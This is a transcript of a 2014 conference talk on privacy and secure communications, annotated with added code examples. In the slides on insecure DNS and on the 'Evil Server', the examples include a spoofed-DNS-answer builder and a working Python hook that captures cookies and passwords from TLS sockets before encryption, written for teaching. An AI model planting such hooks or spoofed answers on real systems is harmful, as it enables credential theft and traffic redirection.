NSA-proof communications (mostly)
Jan Seidl
NSA-Proof Communications. SEIDL, Jan
FISL 2014 – Porto Alegre, Brasil
Slides after 49 (SlideShare preview text: only each slide's title and the first words of its body survive; the full transcript on this page covers slides 1 to 49)

False sense of security
- Always keep in mind the Evil Server (continued)

E-mail never meant to be secure
- Truth is, email is ooooooold
- Second, email is also plaintext
- But hey, I've heard of this PGP thingy...
- And there's also a GNU version!
- Fact is: PGP is quite complicated
- Fact is: PGP doesn't protect metadata
- Fact is: E-mail can't be fixed

Secure communications
- As Jack the Ripper would say, let's go by parts
- Now that you know you can't trust the parties...
- Make sure your workstation is secure
- Roll your own local DNS server
- Embrace the darkness (two slides)
- Perfect-forward secrecy (eleven slides)

Secure communication infrastructure
- More load to process, more time to process
- First, choose your preferred Linux flavor
- Let's start with some good full-disk encryption
- Then harden that system, baby!
- SSL EVERYWHERE
- LDAP for identity management & ...
- Pretty default mail stack
- We add auto PGP encryption to it
- PGP supported software
- XMPP for chat (two slides)
- Compliant XMPP+OTR clients
- XMPP+OTR clients + S/ZRTP
- Optional insecure feature: Web-mail interface (two slides)
- The final product
- Secure communication infrastructure (title only)

The remaining points of failure
- Metadata is gold and is always leaking out (two slides)
- Code may have bugs
- Code may have features (three slides)
- Agencies can be very persuasive
- So I'll never be completely safe?
- Well, so I don't need to do security at all

Closing up
- We know security is not easy
- Sometimes it can be a pain
- But you gotta take care out there!

That's all folks!
http://wroot.org
@jseidl
jseidl@wroot.org
https:/... (truncated in the source)
NSA-Proof communications (mostly)

A brief overview of digital privacy: why and how you can be spied on or have your data stolen, how to protect yourself, and how to take a safer approach to data sharing.

This presentation was given in May at FISL (Forum Internacional do Software Livre) 2014 in Porto Alegre, Brazil.

Presentation video (pt_BR): https://www.youtube.com/watch?v=gHuUnm0zckg

Published in: Technology, News & Politics

Transcript of slides 1 to 49
Slide 1: NSA-proof communications (mostly)
Jan Seidl

Slide 2: $ whoami
Full Name: Jan Seidl
Origin: Rio de Janeiro, RJ – Brazil
Work:
- CTO @ TI Safe
- Open-source contributor for: PEV, Logstash
- Code and snippets @ github.com/jseidl
Features:
- UNIX evangelist/addict/freak (but no fanboy!)
- Digital tools blacksmith / Python and C lover
- Guitarist @ UmInE
- Coffee dependent
- Hates printers and social networks
- Proud DC Labs researcher
(Footer on most slides: NSA-Proof Communications. SEIDL, Jan. FISL 2014 – Porto Alegre, Brasil)

Slide 3: $ agenda
0x0 Quick summary on privacy
0x1 Who, why and how can you be spied on
0x2 Cryptography primer
0x3 Insecure communications
0x4 False sense of security
0x5 E-mail never meant to be secure
0x6 Secure communications (mostly)
0x7 Creating a mostly secure communication infrastructure
0x8 The remaining points of failure
0x9 Closing up
0xA Questions?
Slide 4: Quick summary on privacy (section)
https://xkcd.com/1269/

Slide 5: Why privacy matters
You do not hold only info about yourself.
You may hold key information about other people's lives.
Less information about your target = harder to engage.
OPSEC: http://en.wikipedia.org/wiki/Operations_security

Slide 6: Are we more public than before?
Most people know about physical-world threats.
Most people don't know about digital threats.
And it's not their fault (mostly).

Slide 7: Are we more public than before?
Q: Do you stop a random stranger on the street and tell him:
- Your past locations (incl. home, work, school, shops, parties)
- Your parents' and kids' names, locations, ages and pictures
- Your favorite interests (movies, books, sports etc.)
- Confirmation that you'll be at a given event

Slide 8: Are we more public than before?
Q: Would you easily engage in conversation with someone who shared interests or experiences such as
- Being at your past locations (incl. home, work, school, shops, parties)
- Having parents and kids with the same names, ages and locations
- Sharing your favorite interests (movies, books, sports etc.)
- Going to that given event

Slide 9: Are we more public than before?
Q: Do you think agencies, criminals and spies can easily and sufficiently profile you using publicly available information?
Yes, and there's also a cool term for it: OSINT
http://en.wikipedia.org/wiki/Open-source_intelligence

Slide 10: PLEASE STOP sharing everything on the INTERNET!

Slide 11: Sharing is definitely not caring
There's a huge chance you're an oversharer.
Yes. There is. Stop your internal dialog.

Slide 12: The Internet is FINO – First-In-Never-Out
Even with court orders. There's always a copy somewhere.
E.g.: Google caches, the Internet Archive, someone's hard disk.
The Internet never forgets!!1!
Slide 13: Who/why/how can you be spied on? (section)

Slide 14: Who would spy on me?
- Commercial competitors
- Haters (are you from a race/religion someone doesn't like?)
- Agencies
- "Data miners"
- "Marketing research"
- Criminals / psychos

Slide 15: Why would someone spy on me? I have no valuable data!
YES YOU DO!
You might have key intelligence files / information about your company.
You might not know their value.

Slide 16: Why would someone spy on me? I have no valuable data!
SOMETIMES IT'S NOT ABOUT YOU!
You may know / be communicating with someone worth spying on.
Your identity can be stolen to gain leverage on a target.

Slide 17: How would someone (digitally) spy on me?
- Local machine compromise
- Communications interception (local LAN, ISP, remote LAN)
- Remote server compromise

Slide 18: Where can your data be stolen? (diagram)

Slide 19: Where can your data be stolen?
Here. Here. Here. Here. Here. Here. Here. Here. Here. Here. (the same diagram, with "Here" stamped on every stage of the path)

Slide 20: Do you still feel safe?
Relax, me neither.
Slide 21: Cryptography primer (section)

Slide 22: What the heck is encryption?
Long story short: it makes plaintext unreadable unless the key is provided.
No! Perl is not ciphertext (I think...)

Slide 23: What the heck is encryption?
Sample dumbest example ever: f(text, key) → 2·text ^ (key/3)

Slide 24: What does it provide?
Two out of three of the CIA triad (no, not the agency!): confidentiality and integrity.
Also: identification, authentication and non-repudiation.
(Strictly, encryption by itself gives only confidentiality. Integrity and authentication come from the MAC or digital signature that a well-designed protocol pairs with the cipher, which is why modern cipher suites use authenticated encryption such as AES-GCM rather than a bare cipher.)

Slide 25: Asymmetric vs symmetric
Key-pair (asymmetric): different keys for encryption and decryption; slower; easier to maintain (each party only has to protect its own private key).
Single key (symmetric): the same key for both; faster; harder to maintain (every pair of parties needs a shared secret delivered securely beforehand).

Slide 26: Asymmetric vs symmetric (same table, annotated)
The private key MUST be kept private; the public key can be public. A symmetric key must be kept private by everyone who holds it.

Slide 27: How HTTPS works (diagram)

Slide 28: How HTTPS works
Asymmetric, then symmetric: the handshake uses asymmetric cryptography to authenticate the server and agree on a session key, and the bulk data is then protected with symmetric cryptography under that session key.

Slide 29: Is cryptography gonna make me safe?
Well... that depends...

Slide 30: Is cryptography gonna make me safe?
It's supposed to... but then...
http://heartbleed.com/

Slide 31: Is cryptography gonna make me safe?
It's supposed to... but then...
https://www.imperialviolet.org/2014/02/22/applebug.html (Apple's "goto fail" TLS bug)

Slide 32: Is cryptography gonna make me safe?
FACT: People make mistakes. People make code. Code gets bugs.

Slide 33: Legal issues
Encryption is not allowed everywhere. It might be seen as a sign of illegal activity! So be advised!
http://en.wikipedia.org/wiki/Cryptography_law
http://bit.ly/RbsYgo
Slide 34: Insecure communications (section)
http://xkcd.com/257/

Slide 35: Which services are insecure?
(service logos; redacted in the transcript as ** ** ****)

Slide 36: Whaa? But don't they use HTTPS?
HTTPS protects you from traffic eavesdropping on the wire.
Traffic gets deciphered at the company's server before going on to its destination.
Agencies may request your data to be forwarded to them (court orders).
Agencies may request the company's private keys for interception (same as above).
Booya!

Slide 37: Should I break up with them?
You could. But you don't really need to.
Just don't say anything there that you wouldn't say to a random stranger.
If you need to exchange sensitive information, escalate to a secure medium.
Slide 38: What about DNS servers?
Responsible for connecting us to the host we want.
Can be perverted to use the host THEY want.

Slide 39: What about DNS servers?
It is not that hard at all. DNS is a plaintext protocol. ewww...
(Plain DNS over UDP/53 carries the query and the answer unencrypted and unauthenticated: anyone on the path reads the names you look up, and can answer in the resolver's place because the client only matches the 16-bit transaction ID, the source port and the question. DNSSEC signs the data and DNS over TLS/HTTPS hides it from the path; the deck's own answer, later on, is to run your own local resolver.)

Slide 40: The case of the famous Brazilian ISP
Google servers DNS lookup from a foreign (USA) connection (ping + dig using Google's DNS server). [screenshot, not in the transcript]

Slide 41: The case of the famous Brazilian ISP
Google servers DNS lookup from the ISP connection (ping + dig using Google's DNS server). [screenshot, not in the transcript]
The pair of screenshots is the evidence for slide 38: the comparison is meant to show that the same name, resolved through the same public resolver, comes back different from inside the ISP's network than from abroad.
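Slides 38 to 41 state that DNS is plaintext and can be redirected, but the evidence is two screenshots. The following Go program is an added example, not part of the deck: it builds the query that dig would send, parses it the way an on-path observer would (including DNS name compression, which a real tap has to handle), and then builds both the genuine answer and the answer an ISP box could inject after reading the same query. The name www.google.com is taken from the slides; the transaction ID and the two addresses (RFC 5737 documentation ranges) are constructed for the demo, and only the Go standard library is used.

```go
package main

import (
	"encoding/binary"
	"errors"
	"fmt"
	"net"
	"strings"
)

const hdrLen = 12 // ID, flags, QDCOUNT, ANCOUNT, NSCOUNT, ARCOUNT

var errTruncated = errors.New("truncated DNS message")

// BuildQuery is roughly what `dig A www.google.com @8.8.8.8` puts on the wire:
// the header, the name as length-prefixed labels, then QTYPE A and QCLASS IN.
func BuildQuery(id uint16, name string) []byte {
	msg := make([]byte, hdrLen)
	binary.BigEndian.PutUint16(msg[0:], id)
	binary.BigEndian.PutUint16(msg[2:], 0x0100) // flags: recursion desired
	binary.BigEndian.PutUint16(msg[4:], 1)      // QDCOUNT
	for _, l := range strings.Split(strings.TrimSuffix(name, "."), ".") {
		msg = append(append(msg, byte(len(l))), l...)
	}
	return append(msg, 0, 0, 1, 0, 1)
}

// readName decodes a possibly compressed name at off; it returns the name and the
// offset just past it in the stream (following a pointer does not advance that).
func readName(msg []byte, off int) (string, int, error) {
	var labels []string
	end := -1
	for hops := 0; hops < 64 && off < len(msg); hops++ {
		l := int(msg[off])
		switch {
		case l == 0:
			if end < 0 {
				end = off + 1
			}
			return strings.Join(labels, ".") + ".", end, nil
		case l&0xC0 == 0xC0 && off+1 < len(msg): // compression pointer
			if end < 0 {
				end = off + 2
			}
			off = int(binary.BigEndian.Uint16(msg[off:]) & 0x3FFF)
		case l < 0x40 && off+1+l <= len(msg):
			labels = append(labels, string(msg[off+1:off+1+l]))
			off += 1 + l
		default:
			return "", 0, errTruncated
		}
	}
	return "", 0, errTruncated
}

// ParseQuestion returns what any on-path observer learns from the packet: the
// transaction ID, the queried name and type, plus the offset where records begin.
func ParseQuestion(msg []byte) (id uint16, name string, qtype uint16, off int, err error) {
	if len(msg) < hdrLen {
		return 0, "", 0, 0, errTruncated
	}
	if name, off, err = readName(msg, hdrLen); err != nil || off+4 > len(msg) {
		return 0, "", 0, 0, errTruncated
	}
	return binary.BigEndian.Uint16(msg), name, binary.BigEndian.Uint16(msg[off:]), off + 4, nil
}

// BuildAnswer echoes the query (same ID, same question) with QR/RD/RA set and one A
// record. The real resolver and an on-path spoofer produce the same bytes apart
// from the address, and the client accepts whichever answer arrives first.
func BuildAnswer(query []byte, ip net.IP) ([]byte, error) {
	ip4 := ip.To4()
	if _, _, _, _, err := ParseQuestion(query); err != nil || ip4 == nil {
		return nil, errors.New("need a well-formed query and an IPv4 address")
	}
	resp := append([]byte{}, query...)
	binary.BigEndian.PutUint16(resp[2:], 0x8180) // QR, RD, RA
	binary.BigEndian.PutUint16(resp[6:], 1)      // ANCOUNT
	rr := []byte{0xC0, 0x0C, 0, 1, 0, 1, 0, 0, 0, 60, 0, 4} // name pointer, A, IN, TTL 60, RDLENGTH 4
	return append(resp, append(rr, ip4...)...), nil
}

// FirstA extracts the IPv4 address from the first answer record.
func FirstA(resp []byte) (net.IP, error) {
	_, _, _, off, err := ParseQuestion(resp)
	if err != nil || binary.BigEndian.Uint16(resp[6:]) == 0 {
		return nil, errors.New("no answer section")
	}
	if _, off, err = readName(resp, off); err != nil || off+14 > len(resp) {
		return nil, errTruncated
	}
	if binary.BigEndian.Uint16(resp[off:]) != 1 || binary.BigEndian.Uint16(resp[off+8:]) != 4 {
		return nil, errors.New("first record is not an A record")
	}
	return net.IPv4(resp[off+10], resp[off+11], resp[off+12], resp[off+13]), nil
}

func main() {
	q := BuildQuery(0xBEEF, "www.google.com") // constructed sample; the name is from the slides
	_, name, _, _, _ := ParseQuestion(q)
	spoofed, _ := BuildAnswer(q, net.ParseIP("198.51.100.7")) // RFC 5737 address standing in for the ISP's box
	ip, _ := FirstA(spoofed)
	fmt.Println("on-path observer read", name, "and can answer it with", ip)
}
```

Nothing in either answer is signed, which is why the client cannot prefer the genuine one; with DNSSEC the spoofed record would fail validation, and with DNS over TLS the observer would not have seen the question in the first place.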
Slide 42: Keep that motto in mind
Don't think someone may be watching. KNOW that someone IS watching!

Slide 43: False sense of security (section)
Slide 44: HTTPS is not gonna save you
Don't feel safe only because of that padlock icon.
Certificates/keys may be stolen or taken over.
Didn't I say that already?

Slide 45: HTTPS is not gonna save you
Private key custody = ability to get plaintext!
"ssldump is an SSL/TLS network protocol analyzer. (...) If provided with the appropriate keying material, it will also decrypt the connections and display the application data traffic."
http://www.rtfm.com/ssldump/Ssldump.html
(Caveat: this only works when the session key is transported under the server's RSA key, as in the TLS_RSA_* cipher suites. With an ephemeral Diffie-Hellman key exchange the server's private key only signs the handshake, so a recording cannot be decrypted afterwards even by the key's owner. That property is the "perfect forward secrecy" the deck comes back to later.)
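Slide 28 labels the two halves of HTTPS (asymmetric handshake, symmetric bulk transfer), slide 45 claims that custody of the server's private key is custody of the plaintext, and the "Perfect-forward secrecy" slides later in the deck are the counterpoint. The following Go program is an added example, not code from the deck or from ssldump, that models the two key exchanges side by side: an RSA key transport like the TLS_RSA_* suites, where a recorded session is decryptable by whoever obtains the server key, and an ephemeral X25519 exchange, where the same key gives the same attacker nothing. The AES-GCM "records", the SHA-256 key derivation standing in for the TLS key schedule, the 2048-bit test key and the sample message are all constructed for the demo; handshake signatures and transcript hashes are left out. Only the Go standard library is used (crypto/ecdh needs Go 1.20 or newer).

```go
package main

import (
	"crypto/aes"
	"crypto/cipher"
	"crypto/ecdh"
	"crypto/rand"
	"crypto/rsa"
	"crypto/sha256"
	"errors"
	"fmt"
	"io"
)

// seal and open are the symmetric half of a session: AES-256-GCM, nonce prepended.
func seal(key, plaintext []byte) []byte {
	block, _ := aes.NewCipher(key)
	gcm, _ := cipher.NewGCM(block)
	nonce := make([]byte, gcm.NonceSize())
	io.ReadFull(rand.Reader, nonce)
	return gcm.Seal(nonce, nonce, plaintext, nil)
}

func open(key, sealed []byte) ([]byte, error) {
	block, err := aes.NewCipher(key)
	if err != nil {
		return nil, err
	}
	gcm, _ := cipher.NewGCM(block)
	if len(sealed) < gcm.NonceSize() {
		return nil, errors.New("short record")
	}
	return gcm.Open(nil, sealed[:gcm.NonceSize()], sealed[gcm.NonceSize():], nil)
}

// Capture is what a passive tap (or an agency with a court order) records of a session.
type Capture struct {
	KeyExchange []byte // RSA-wrapped session key, or the client's ephemeral public key
	Record      []byte // application data sealed under the session key
}

// rsaSession models a TLS_RSA_* handshake (TLS 1.2 and earlier): the client invents
// the session key and encrypts it to the server's long-term RSA public key.
func rsaSession(serverPub *rsa.PublicKey, msg []byte) (Capture, error) {
	key := make([]byte, 32)
	if _, err := io.ReadFull(rand.Reader, key); err != nil {
		return Capture{}, err
	}
	wrapped, err := rsa.EncryptOAEP(sha256.New(), rand.Reader, serverPub, key, nil)
	if err != nil {
		return Capture{}, err
	}
	return Capture{KeyExchange: wrapped, Record: seal(key, msg)}, nil
}

// decryptCapture is ssldump with the server key: unwrap the session key from the
// recorded handshake, then open the records, years after the fact if need be.
func decryptCapture(serverPriv *rsa.PrivateKey, c Capture) ([]byte, error) {
	key, err := rsa.DecryptOAEP(sha256.New(), nil, serverPriv, c.KeyExchange, nil)
	if err != nil {
		return nil, fmt.Errorf("no session key recoverable from the capture: %w", err)
	}
	return open(key, c.Record)
}

// ecdheSession models an ECDHE handshake: both sides make a one-off X25519 key,
// derive the session key from the shared secret and drop the ephemeral keys. The
// long-term key only signs the handshake (signature omitted here), so nothing in
// the capture is encrypted under it. Returns the capture and what the server read.
func ecdheSession(msg []byte) (Capture, []byte, error) {
	curve := ecdh.X25519()
	clientEph, err := curve.GenerateKey(rand.Reader)
	if err != nil {
		return Capture{}, nil, err
	}
	serverEph, err := curve.GenerateKey(rand.Reader)
	if err != nil {
		return Capture{}, nil, err
	}
	shared, err := clientEph.ECDH(serverEph.PublicKey())
	if err != nil {
		return Capture{}, nil, err
	}
	key := sha256.Sum256(shared) // stand-in for the TLS key schedule (HKDF in TLS 1.3)
	c := Capture{KeyExchange: clientEph.PublicKey().Bytes(), Record: seal(key[:], msg)}
	plain, err := open(key[:], c.Record) // server side; both ephemeral keys are discarded after this
	return c, plain, err
}

func main() {
	serverKey, _ := rsa.GenerateKey(rand.Reader, 2048)                     // the server's long-term key
	msg := []byte("constructed sample: merger closes Friday, keep quiet") // made-up plaintext
	rsaCap, _ := rsaSession(&serverKey.PublicKey, msg)
	got, err := decryptCapture(serverKey, rsaCap)
	fmt.Printf("RSA key exchange + server key: %q (err=%v)\n", got, err)
	ecCap, _, _ := ecdheSession(msg)
	got, err = decryptCapture(serverKey, ecCap)
	fmt.Printf("ECDHE + the same server key: %q (err=%v)\n", got, err)
}
```

The first capture opens because the session key is literally inside it, wrapped under a key the attacker now holds; the second fails because the only key-bearing material on the wire is a public point, and recovering the shared secret from two public points is the Diffie-Hellman problem, which the long-term key does not help with. That is the whole argument for forward-secret cipher suites: a key that is seized next year must not unlock traffic recorded today.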
Slide 46: HTTPS is not gonna save you
"Server Name Indication (SNI) is an extension to the TLS protocol[1] that indicates what hostname the client is attempting to connect to at the start of the handshaking process. This allows a server to present multiple certificates on the same IP address and port number and hence allows multiple secure (HTTPS) websites (or any other service over TLS) to be served off the same IP address without requiring all those sites to use the same certificate. It is the conceptual equivalent to HTTP/1.1 virtual hosting for HTTPS."
http://en.wikipedia.org/wiki/Server_Name_Indication
The point for this deck: the hostname travels in the ClientHello, before any key has been agreed, so it is visible in cleartext to everyone on the path even though the rest of the session is encrypted.
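The quoted definition explains what SNI is for; the security point of the slide is that the hostname is sent before any key exists. The following Go program is an added example rather than anything from the deck: it builds a minimal ClientHello carrying a server_name extension (constructed for the demo: an all-zero random, one cipher suite, no other extensions) and then parses it the way a passive tap would, with every length field checked against what is left of the packet. The host name mail.example.org is made up, and only the Go standard library is used.

```go
package main

import (
	"encoding/binary"
	"errors"
	"fmt"
)

func u16(n int) []byte { return []byte{byte(n >> 8), byte(n)} }

// BuildClientHello constructs a minimal TLS 1.2 ClientHello record with a server_name
// extension (RFC 6066 section 3). Constructed for the demo: a real hello has a random
// nonce, more cipher suites and more extensions, but the SNI layout is the same.
func BuildClientHello(host string) []byte {
	name := append([]byte{0}, u16(len(host))...)   // NameType host_name(0), length
	name = append(name, host...)
	list := append(u16(len(name)), name...)        // ServerNameList
	ext := append([]byte{0, 0}, u16(len(list))...) // extension_type server_name(0), length
	ext = append(ext, list...)
	body := append([]byte{3, 3}, make([]byte, 32)...) // client_version, random (zeros)
	body = append(body, 0)                            // session_id: empty
	body = append(body, 0, 2, 0xC0, 0x2F)             // one suite: TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256
	body = append(body, 1, 0)                         // compression_methods: null
	body = append(body, u16(len(ext))...)
	body = append(body, ext...)
	hs := append([]byte{1, byte(len(body) >> 16), byte(len(body) >> 8), byte(len(body))}, body...)
	return append(append([]byte{0x16, 3, 1}, u16(len(hs))...), hs...) // record: handshake
}

// take pops n bytes from *p, failing if the packet is shorter than a length field claims.
func take(p *[]byte, n int) ([]byte, error) {
	if len(*p) < n {
		return nil, errors.New("truncated ClientHello")
	}
	out := (*p)[:n]
	*p = (*p)[n:]
	return out, nil
}

// vec pops a length-prefixed vector whose length field is width (1 or 2) bytes wide.
func vec(p *[]byte, width int) ([]byte, error) {
	l, err := take(p, width)
	if err != nil {
		return nil, err
	}
	n := 0
	for _, b := range l {
		n = n<<8 | int(b)
	}
	return take(p, n)
}

// ExtractSNI does what a passive tap does with the first packet of a TLS connection:
// skip the ClientHello's fixed fields and vectors, find the server_name extension and
// return host_name, all before a single byte of the session has been encrypted.
func ExtractSNI(rec []byte) (string, error) {
	if len(rec) < 5 || rec[0] != 0x16 {
		return "", errors.New("not a TLS handshake record")
	}
	p := rec[5:]
	if hdr, err := take(&p, 4); err != nil || hdr[0] != 1 {
		return "", errors.New("not a ClientHello")
	}
	if _, err := take(&p, 34); err != nil { // client_version + random
		return "", err
	}
	for _, width := range []int{1, 2, 1} { // session_id, cipher_suites, compression_methods
		if _, err := vec(&p, width); err != nil {
			return "", err
		}
	}
	exts, err := vec(&p, 2)
	if err != nil {
		return "", err
	}
	for len(exts) > 0 {
		typ, err := take(&exts, 2)
		if err != nil {
			return "", err
		}
		data, err := vec(&exts, 2)
		if err != nil {
			return "", err
		}
		if binary.BigEndian.Uint16(typ) != 0 { // not server_name: skip it
			continue
		}
		list, err := vec(&data, 2) // ServerNameList
		for err == nil && len(list) > 0 {
			var nameType, name []byte
			if nameType, err = take(&list, 1); err == nil {
				name, err = vec(&list, 2)
			}
			if err == nil && nameType[0] == 0 { // host_name
				return string(name), nil
			}
		}
		return "", errors.New("server_name extension without a usable host_name")
	}
	return "", errors.New("no server_name extension")
}

func main() {
	hello := BuildClientHello("mail.example.org") // made-up host name
	host, err := ExtractSNI(hello)
	fmt.Printf("first packet of the connection already names the site: %q (err=%v)\n", host, err)
}
```

This is the same parse a DPI box or a censoring ISP performs to block or log by site name despite HTTPS. The later Encrypted Client Hello extension addresses exactly this leak, but it is not universally deployed, so in practice the padlock still tells the network which site you are talking to.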
47. [False sense of security] Always keep in mind the Evil Server.
48. [False sense of security] Always keep in mind the Evil Server: server/network owners and admins might intercept your data; criminals may have a foothold on the target server; data generally flows unencrypted on internal infrastructure; data can be found unencrypted in memory and in session files.
49. [False sense of security] Always keep in mind the Evil Server: user-land libraries may dump your SSL. "(…) attempts to MITM these communications at the network level have been fruitless. To get at this sensitive data we will intercept calls to SSL_write, the function responsible for encrypting then sending data over a socket. Intercepting SSL_write will allow us to log the string sent to the function and pass the original parameters along, effectively bypassing the encryption protections while allowing the application to run normally." https://www.netspi.com/DesktopModules/SunBlog/Handlers/Print.aspx?id=191
50. [False sense of security] Always keep in mind the Evil Server: Man-in-the-App proof-of-concept credential sniffer, https://github.com/jseidl/mita "(…) will detect and log any credential communication over cookies and GET/POST requests and exfiltrate somewhere. (…) monitors data from inside application context/env., thus can't be defeated by the use of SSL."
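The SSL_write interception and the mita credential sniffer share one idea: hook inside the process, where the data has not been encrypted yet. This added example (not the mita or NetSPI code) shows the Python flavour of that trick: it wraps ssl.SSLSocket.sendall so that every outbound buffer is scanned for cookies, Authorization headers and credential-looking form fields, and then forwarded unchanged. The HTTP request, the field-name regex and the stand-in socket class are constructed for the demo; CAPTURED stands in for the "exfiltrate somewhere" step.

```python
import re
import ssl
from urllib.parse import parse_qs

CAPTURED = []   # the real thing would ship these off-box; here they just pile up

# Field names that usually carry credentials (heuristic chosen for this demo)
CRED_FIELDS = re.compile(r"^(pass(word|wd)?|pwd|secret|token|user(name)?|login|email)$", re.I)

# Constructed sample request, the kind a mail client or browser would hand to TLS
SAMPLE_REQUEST = (
    b"POST /login HTTP/1.1\r\nHost: mail.example.org\r\n"
    b"Cookie: session=abc123\r\nAuthorization: Basic Ym9iOmh1bnRlcjI=\r\n"
    b"Content-Type: application/x-www-form-urlencoded\r\nContent-Length: 25\r\n\r\n"
    b"user=bob&password=hunter2"
)


def find_credentials(payload: bytes) -> dict:
    """Scan one HTTP request for cookies, Authorization headers and
    credential-looking fields in the query string or a POST body."""
    found = {}
    head, _, body = payload.partition(b"\r\n\r\n")
    lines = head.decode("latin-1").split("\r\n")
    parts = lines[0].split()
    if len(parts) < 2:
        return found                              # not an HTTP request line
    method, target = parts[0], parts[1]
    for line in lines[1:]:
        name, _, value = line.partition(":")
        if name.lower() in ("cookie", "authorization"):
            found[name.lower()] = value.strip()
    if "?" in target:
        for key, values in parse_qs(target.split("?", 1)[1]).items():
            if CRED_FIELDS.match(key):
                found["query." + key] = values[0]
    if method == "POST":
        for key, values in parse_qs(body.decode("latin-1")).items():
            if CRED_FIELDS.match(key):
                found["form." + key] = values[0]
    return found


def install_hook(cls=ssl.SSLSocket):
    """Monkey-patch cls.sendall: log credentials, then call the original so
    the application keeps working. Returns the original for uninstalling."""
    original = cls.sendall

    def hooked_sendall(self, data, *args, **kwargs):
        creds = find_credentials(bytes(data))     # plaintext: TLS has not run yet
        if creds:
            CAPTURED.append(creds)
        return original(self, data, *args, **kwargs)

    cls.sendall = hooked_sendall
    return original


class _DummySocket:
    """Stand-in for ssl.SSLSocket so the hook can be exercised offline."""
    sent = []

    def sendall(self, data):
        self.sent.append(bytes(data))


def demo() -> dict:
    """Install the hook on the dummy class, send the sample request, and
    return what the hook captured from it."""
    install_hook(_DummySocket)
    _DummySocket().sendall(SAMPLE_REQUEST)
    return CAPTURED[-1]


if __name__ == "__main__":
    print(demo())
```

Pointing install_hook() at the real ssl.SSLSocket (its default) does the same thing to any Python program that imports this module first, for instance via sitecustomize.py. The lesson for defenders is the one the slide makes: TLS protects the wire, not a process that is already running attacker-controlled code.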
51. E-mail never meant to be secure: truth is, e-mail is oooooold. First concept ~1962 (AUTODIN). From host-based, to LAN-based, to ARPANET-based, to Internet-based. In IT, old pans don't make good food.
52. E-mail never meant to be secure: second, e-mail is also plaintext. You're starting to hate this word, aren't you?
53. E-mail never meant to be secure. "But hey, I've heard of this PGP thingy... It has that encryption thing you were talking about..." Yep! And it can also be used to verify the identity of the sender!
54. E-mail never meant to be secure: and there's also a GNU version (GnuPG)! Isn't that beautiful?
55. E-mail never meant to be secure: fact is, PGP is quite complicated. Did I mention the lack of mail client support?
56. E-mail never meant to be secure: fact is, PGP doesn't protect metadata: the servers involved, people's names and e-mail addresses, the Subject line, and lots of other information.
57. E-mail never meant to be secure: fact is, e-mail can't be fixed (in my opinion). Encryption breaks search; indexing hurts security. Decrypt all your messages to search? Good luck with that. With forward secrecy, messages will be lost over time. Key handling would be a nightmare.
58. Secure communications
59. Secure communications (mostly): as Jack the Ripper would say, let's go by parts.
60. Secure communications (mostly): now that you know you can't trust the parties. There's no way you want your data in plaintext over the circuit. The service machine may be evil and under 3rd-party control. Your own network may be compromised. You definitely can't trust any ISP. You better not trust anyone ;)
61. Secure communications (mostly): make sure your workstation is secure. Prefer live-CD operating systems, e.g. https://tails.boum.org/
62. Secure communications (mostly): roll your own local DNS server, and configure it properly! Completely block outside access, listen on loopback only, etc.
63. Secure communications (mostly): embrace the darkness. Darknets are the new black. "A darknet is a private network where connections are made only between trusted peers (…) Darknets are distinct from other distributed peer-to-peer networks as sharing is anonymous (…) and therefore users can communicate with little fear of governmental or corporate interference." http://en.wikipedia.org/wiki/Darknet_(file_sharing)
64. Secure communications (mostly): embrace the darkness. Popular darknets: https://www.torproject.org/ http://geti2p.net/en/ https://freenetproject.org/
65. Secure communications (mostly): perfect forward secrecy. "(...) Allows today's information to be kept secret even if the private key is compromised in the future." Vincent Bernat, PhD
66. Secure communications (mostly): perfect forward secrecy. Without forward secrecy (TLS-AES128-SHA, i.e. static RSA key exchange: the client encrypts the premaster secret to the server's long-term key, so that key unlocks every recorded session). http://vincent.bernat.im/en/blog/2011-ssl-perfect-forward-secrecy.html
67. Secure communications (mostly): perfect forward secrecy. With forward secrecy (Ephemeral Diffie-Hellman). http://vincent.bernat.im/en/blog/2011-ssl-perfect-forward-secrecy.html "Because the Diffie-Hellman exchange described above always uses new random values a and b, it is called Ephemeral Diffie-Hellman (EDH or DHE). Cipher suites like DHE-RSA-AES128-SHA use this protocol to achieve perfect forward secrecy." Optional forward secrecy: ECDHE-RSA-AES128-SHA:AES128-SHA:RC4-SHA. Forward secrecy only: ECDHE-RSA-AES128-SHA:DHE-RSA-AES128-SHA:EDH-DSS-DES-CBC3-SHA. (These strings illustrate key-exchange selection only; RC4 and 3DES are obsolete ciphers and should not be offered today.)
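The ssldump slide and the two forward-secrecy slides are two sides of the same coin, so here is one added example (not from the talk or from Bernat's post) that plays out both handshakes with deliberately tiny, insecure toy parameters: with static RSA key exchange the recorded ciphertext plus a later-leaked private key yields the session key; with DHE the long-term key only signed the server's share, and the per-session exponents are gone. A small helper also splits an OpenSSL-style cipher string into suites with and without ephemeral key exchange, using a prefix heuristic on OpenSSL suite names. The RSA primes, DH group and KDF are stand-ins chosen for this demo, not anything TLS actually uses.

```python
import hashlib
import secrets

# Toy server long-term RSA key (constructed; real keys are 2048+ bits)
P = 2**61 - 1
Q = 2**89 - 1
N = P * Q
E = 65537
D = pow(E, -1, (P - 1) * (Q - 1))

# Toy DH group (constructed; real deployments use 2048-bit+ groups)
DH_P = 2**127 - 1
DH_G = 3


def kdf(secret: int) -> bytes:
    """Stand-in for the TLS PRF: derive a session key from the shared secret."""
    return hashlib.sha256(secret.to_bytes(32, "big")).digest()


def rsa_handshake():
    """AES128-SHA style: the client encrypts a premaster secret to the
    server's RSA key. The wire carries that ciphertext forever."""
    premaster = int.from_bytes(secrets.token_bytes(16), "big")
    encrypted = pow(premaster, E, N)
    transcript = {"kx": "RSA", "encrypted_premaster": encrypted}
    return kdf(premaster), transcript


def dhe_handshake():
    """DHE-RSA-AES128-SHA style: fresh exponents a, b per session; the
    long-term RSA key only signs the server's share g^b."""
    a = secrets.randbelow(DH_P - 2) + 1          # client's ephemeral exponent
    b = secrets.randbelow(DH_P - 2) + 1          # server's ephemeral exponent
    ga, gb = pow(DH_G, a, DH_P), pow(DH_G, b, DH_P)
    digest = int.from_bytes(hashlib.sha256(gb.to_bytes(16, "big")).digest(), "big") % N
    signature = pow(digest, D, N)                # server authenticates g^b
    assert pow(signature, E, N) == digest        # client verifies before continuing
    shared_client, shared_server = pow(gb, a, DH_P), pow(ga, b, DH_P)
    assert shared_client == shared_server
    transcript = {"kx": "DHE", "g_a": ga, "g_b": gb, "server_sig": signature}
    del a, b                                     # exponents are discarded after the handshake
    return kdf(shared_client), transcript


def attacker_with_private_key(transcript, d=D):
    """Adversary who recorded the handshake and later obtained the server's RSA
    private key (the ssldump -k scenario). Returns the session key or None."""
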